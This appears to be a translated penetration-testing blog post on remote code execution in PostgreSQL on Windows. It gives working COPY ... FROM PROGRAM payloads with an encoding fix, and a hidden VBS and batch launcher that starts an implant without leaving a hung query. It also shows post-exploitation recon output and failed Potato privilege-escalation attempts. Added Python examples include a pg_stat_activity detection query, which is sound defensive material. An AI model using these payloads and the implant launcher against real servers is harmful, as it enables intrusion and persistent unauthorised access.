There are basically no write-ups on PostgreSQL RCE under Windows. There is one on xianzhi (the link no longer opens; it should be this one: https://xz.aliyun.com/t/10202), but the author seems to have written it in a hurry, so it has quite a few problems. What follows are the fixes I arrived at after hitting those pitfalls. The precondition is stacked injection, or being able to connect to the database directly.
As the author of that article says, running a system command directly on Windows throws an error. (Note that `COPY ... FROM PROGRAM` needs a superuser, or from PostgreSQL 11 a member of `pg_execute_server_program`; the error below appears even when you have that.)
```sql
DROP TABLE IF EXISTS dd;
CREATE TABLE dd(dd text);
COPY dd FROM PROGRAM 'whoami /all';
SELECT * FROM dd;
```
```
Time: 0.001s

CREATE TABLE dd(dd text)
OK
Time: 0.002s

COPY dd FROM PROGRAM 'whoami /all'
ERROR: invalid byte sequence for encoding "UTF8": 0xd3 0xc3
CONTEXT: COPY dd, line 2
Time: 0.025s
```
I went to the official docs and looked up the COPY command:
```
COPY table_name [ ( column_name [, ...] ) ]
    FROM { 'filename' | PROGRAM 'command' | STDIN }
    [ [ WITH ] ( option [, ...] ) ]
    [ WHERE condition ]

COPY { table_name [ ( column_name [, ...] ) ] | ( query ) }
    TO { 'filename' | PROGRAM 'command' | STDOUT }
    [ [ WITH ] ( option [, ...] ) ]

where option can be one of:

    FORMAT format_name
    FREEZE [ boolean ]
    DELIMITER 'delimiter_character'
    NULL 'null_string'
    HEADER [ boolean | MATCH ]
    QUOTE 'quote_character'
    ESCAPE 'escape_character'
    FORCE_QUOTE { ( column_name [, ...] ) | * }
    FORCE_NOT_NULL ( column_name [, ...] )
    FORCE_NULL ( column_name [, ...] )
    ENCODING 'encoding_name'
```
So there is an ENCODING option. Appending **with encoding 'ISO-8859-1'** (the documented spelling is `WITH (ENCODING 'ISO-8859-1')`) makes it work. Chinese text in the command output comes back as mojibake, but that does not get in the way of recon. The root cause is that cmd writes its output in the console code page, which on a Simplified-Chinese Windows is 936 (GBK): 0xd3 0xc3 is GBK for 用, the first character of 用户信息 (USER INFORMATION), and is not valid UTF-8. ISO-8859-1 maps every byte to exactly one character, so COPY never rejects anything; naming the real code page instead, `WITH (ENCODING 'GBK')`, should let the server convert the output to UTF8 properly rather than garbling it.
```sql
DROP TABLE IF EXISTS dd;
CREATE TABLE dd(dd text);
COPY dd FROM PROGRAM 'net view' with encoding 'ISO-8859-1';
SELECT * FROM dd;
```
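To make the encoding problem concrete, here is an added Python example that is not part of the original post: it models what COPY does with the program's stdout under each ENCODING choice (the conversion is reproduced in Python, not run against a server), and shows how to recover readable text from mojibake that has already landed in the `dd` table. The sample bytes are constructed from the whoami header 用户信息, whose first two GBK bytes are exactly the 0xd3 0xc3 in the error above; the code-page assumption is 936/GBK, i.e. a Simplified-Chinese host.

```python
# Added example (not code from the original post): why COPY ... FROM PROGRAM
# rejects the command output on a Chinese Windows box, why ISO-8859-1 makes the
# error go away, and how to turn the resulting mojibake back into readable text.
# Everything below runs offline on constructed sample bytes.
import codecs

# Constructed sample: `whoami /all` on a Simplified-Chinese Windows host writes
# its first header, 用户信息 ("USER INFORMATION"), in the console code page,
# which is 936 = GBK.  The first two bytes are exactly the ones in the error.
GBK_STDOUT = "用户信息".encode("gbk")            # d3 c3 bb a7 d0 c5 cf a2
assert GBK_STDOUT[:2] == b"\xd3\xc3"


def copy_from_program_decode(raw: bytes, encoding: str) -> str:
    """Model of what COPY ... WITH (ENCODING 'x') does with the program's
    stdout: the bytes are checked/converted from `encoding` into the database
    encoding (UTF8 here).  Invalid input aborts the COPY; that is modelled as a
    ValueError carrying PostgreSQL's message format."""
    try:
        return codecs.decode(raw, encoding, "strict")
    except UnicodeDecodeError as e:
        bad = " ".join(f"0x{b:02x}" for b in raw[e.start:e.start + 2])
        raise ValueError(
            f'invalid byte sequence for encoding "{encoding}": {bad}') from None


def fix_latin1_mojibake(text: str, codepage: str = "gbk") -> str:
    """Undo the ISO-8859-1 workaround after the fact: each mojibake character
    stands for exactly one original byte, so encoding back to latin-1 restores
    the raw GBK bytes, which the real console code page then decodes."""
    return text.encode("latin-1").decode(codepage)


def demo() -> dict:
    """Run the three COPY variants over the sample and recover the mojibake."""
    out = {}
    try:                                    # 1. default: UTF8 database, raw GBK bytes
        copy_from_program_decode(GBK_STDOUT, "UTF8")
    except ValueError as e:
        out["utf8"] = str(e)
    # 2. the post's workaround: latin-1 accepts every byte, the query succeeds,
    #    Chinese comes out as mojibake
    out["latin1"] = copy_from_program_decode(GBK_STDOUT, "ISO-8859-1")
    # 3. naming the real code page converts it correctly in the first place
    out["gbk"] = copy_from_program_decode(GBK_STDOUT, "GBK")
    # 4. mojibake already sitting in the dd table is still recoverable
    out["recovered"] = fix_latin1_mojibake(out["latin1"])
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:>9}: {v}")
```

The same `fix_latin1_mojibake` round trip is what you apply to the rest of the garbled output: feed it the text exactly as it came out of `SELECT * FROM dd`, and pass a different code page only if the target is not a Simplified-Chinese system.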
If you launch the implant straight from the command the way that article does, the query never ends for as long as the implant is alive: COPY reads the program's stdout until EOF, so the backend stays `active` until every process holding that pipe has exited, and the only way to end the query is to kill the implant. Meanwhile `select * from pg_stat_activity;` on the other side shows an hours-long query in plain sight, with the on-disk path of your implant right there in the query text. Worst of all, short of Task Manager on the server or the server side closing the session, that process cannot be got rid of: neither `taskkill` nor `select pg_terminate_backend(pid);` ends it (the backend only acts on a termination request at its next interrupt check, and a read blocked on the program's pipe never reaches one).
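The other side of that observation is worth writing down: here is an added Python example, not from the original post, showing what a DBA looks for in `pg_stat_activity` and which roles can run `COPY ... PROGRAM` at all. The SQL constants are what you would run on the server (column names as of PostgreSQL 10, `pg_execute_server_program` as of PostgreSQL 11); the Python function applies the same predicate to exported rows so the block runs offline against the constructed sample sessions, including one hung COPY of the kind described above.

```python
# Added example (not code from the original post): the defender's view of the
# hung COPY ... FROM PROGRAM session described above.  DETECTION_SQL is what
# you would run on the server; flag_copy_program() applies the same predicate
# to exported pg_stat_activity rows so it can run offline on the constructed
# sample below.
import re
from datetime import datetime, timedelta, timezone

# Assumption: PostgreSQL 10+ column names, and a reviewer who can see other
# sessions' query text (superuser or the pg_read_all_stats role).
DETECTION_SQL = r"""
SELECT pid, usename, client_addr, state, now() - query_start AS running_for, query
FROM   pg_stat_activity
WHERE  query ~* 'COPY\s.*\s(FROM|TO)\s+PROGRAM'
ORDER  BY query_start;
"""

# Who is even allowed to run COPY ... PROGRAM: superusers, and (PostgreSQL 11+)
# members of pg_execute_server_program.  Anything outside that list is a finding.
PRIVILEGE_SQL = r"""
SELECT rolname
FROM   pg_roles
WHERE  rolsuper OR pg_has_role(oid, 'pg_execute_server_program', 'MEMBER');
"""

# Same match as the SQL above; group 2 is the command string, i.e. the path
# of whatever was launched, which pg_stat_activity hands you verbatim.
PROGRAM_RE = re.compile(r"\bCOPY\b.*?\b(FROM|TO)\s+PROGRAM\s+'([^']*)'", re.I | re.S)


def flag_copy_program(rows, now, long_running=timedelta(minutes=5)):
    """Return one finding per pg_stat_activity row whose query text runs a
    server-side program.  `hung` marks the case from the post: the COPY is
    still active because the launched program has not closed its stdout."""
    findings = []
    for row in rows:
        m = PROGRAM_RE.search(row["query"])
        if not m:
            continue
        age = now - row["query_start"]
        findings.append({
            "pid": row["pid"],
            "user": row["usename"],
            "client": row["client_addr"],
            "direction": m.group(1).upper(),
            "command": m.group(2),
            "running_for": age,
            "hung": row["state"] == "active" and age >= long_running,
        })
    return findings


# Constructed sample rows (not real data), in the shape of
#   SELECT pid, usename, client_addr, state, query_start, query FROM pg_stat_activity
NOW = datetime(2024, 1, 1, 12, 0, tzinfo=timezone.utc)
SAMPLE_ROWS = [
    {"pid": 1201, "usename": "app", "client_addr": "10.0.0.5", "state": "active",
     "query_start": NOW - timedelta(seconds=1),
     "query": "SELECT * FROM orders WHERE id = $1"},
    # Recon command that finished; the session is idle but pg_stat_activity
    # still shows its last statement, so the command text is visible anyway.
    {"pid": 1337, "usename": "postgres", "client_addr": "10.0.0.9", "state": "idle",
     "query_start": NOW - timedelta(minutes=3),
     "query": "COPY dd FROM PROGRAM 'whoami /all' WITH (ENCODING 'ISO-8859-1')"},
    # The implant launched straight from COPY: still active two hours later.
    {"pid": 1338, "usename": "postgres", "client_addr": "10.0.0.9", "state": "active",
     "query_start": NOW - timedelta(hours=2),
     "query": r"COPY dd FROM PROGRAM 'C:\Users\Public\1.exe'"},
]


if __name__ == "__main__":
    for f in flag_copy_program(SAMPLE_ROWS, NOW):
        flag = "HUNG " if f["hung"] else "     "
        print(f"{flag}pid={f['pid']} user={f['user']} from={f['client']} "
              f"{f['direction']} PROGRAM {f['command']!r} running_for={f['running_for']}")
```

Two things the sample makes visible: the `query` column keeps the last statement of an idle session, so even a quick `whoami` stays readable until the session runs something else or disconnects, and the hung case needs no signature at all, a `COPY` that has been `active` for hours is enough on its own.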
The workaround: have a VBS script call a batch file, and have the batch file launch the implant and then exit, so nothing that inherited COPY's pipe stays around, the query returns, and the implant keeps running on its own.

VBS script:

```vbscript
' Run test.bat with a hidden window (style 0); Run does not wait for it by default
Set ws = WScript.CreateObject("WScript.Shell")
ws.Run "test.bat", 0
```

Batch script:

```bat
@echo off
REM start launches 1.exe as its own process and returns immediately
start 1.exe
exit
```
First let's look at `whoami /all`. (The original output was mojibake, as explained above; it is shown here with the Chinese strings translated and the backslashes restored.)

```
USER INFORMATION
----------------

User Name                    SID
============================ ========
nt authority\network service S-1-5-20


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Mandatory Label\System Mandatory Level     Label            S-1-16-16384
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name          Description              State
======================= ======================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```
A PostgreSQL installed with defaults on Windows runs as NETWORK SERVICE, and the postgres.exe process has neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege. (The whoami output lists only SeChangeNotifyPrivilege, which is what pg_ctl leaves behind: it starts postgres.exe under a restricted token created with CreateRestrictedToken and the DISABLE_MAX_PRIVILEGE flag, which disables every privilege except that one.) So the whole Potato family is out: they all die at the step of obtaining a token or authenticating with it. BadPotato fails at DuplicateTokenEx with error 0x542 (1346, ERROR_BAD_IMPERSONATION_LEVEL), and JuicyPotatoNG checks for the privileges up front and exits:

```
[*]
    ____            ______        __        __
   / __ )____ _____/ / __ \____  / /_____ _/ /_____
  / __  / __ `/ __  / /_/ / __ \/ __/ __ `/ __/ __ \
 / /_/ / /_/ / /_/ / ____/ /_/ / /_/ /_/ / /_/ /_/ /
/_____/\__,_/\__,_/_/    \____/\__/\__,_/\__/\____/
Github:https://github.com/BeichenDream/BadPotato/ By:BeichenDream
[*] PipeName : \\.\pipe\f9117ffe84ee4b8b99449dc28eedb31d\pipe\spoolss
[*] ConnectPipeName : \\WIN-8HVRNH9E3VV/pipe/f9117ffe84ee4b8b99449dc28eedb31d
[*] CreateNamedPipeW Success! IntPtr:712
[*] RpcRemoteFindFirstPrinterChangeNotificationEx Success! IntPtr:3029823515808
[*] ConnectNamePipe Success!
[*] CurrentUserName : WIN-8HVRNH9E3VV$
[*] CurrentConnectPipeUserName :
[*] ImpersonateNamedPipeClient Success!
[*] OpenThreadToken Success! IntPtr:1016
Unknown error (0x542)
[!] DuplicateTokenEx fail!
```

```
JuicyPotatoNG
by decoder_it & splinter_code

[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[!] Current process doesn't have SeImpersonate or SeAssignPrimaryToken privileges, exiting...
```
So it is back to the boring route: check the installed KBs and hunt for a matching kernel privilege-escalation CVE... sigh.

Without a suitable CVE, the shell you get back is very low privilege (the machine account, computer name plus `$`); apart from reading some files, it is only good as a low-privilege foothold for port forwarding and further movement inside the internal network.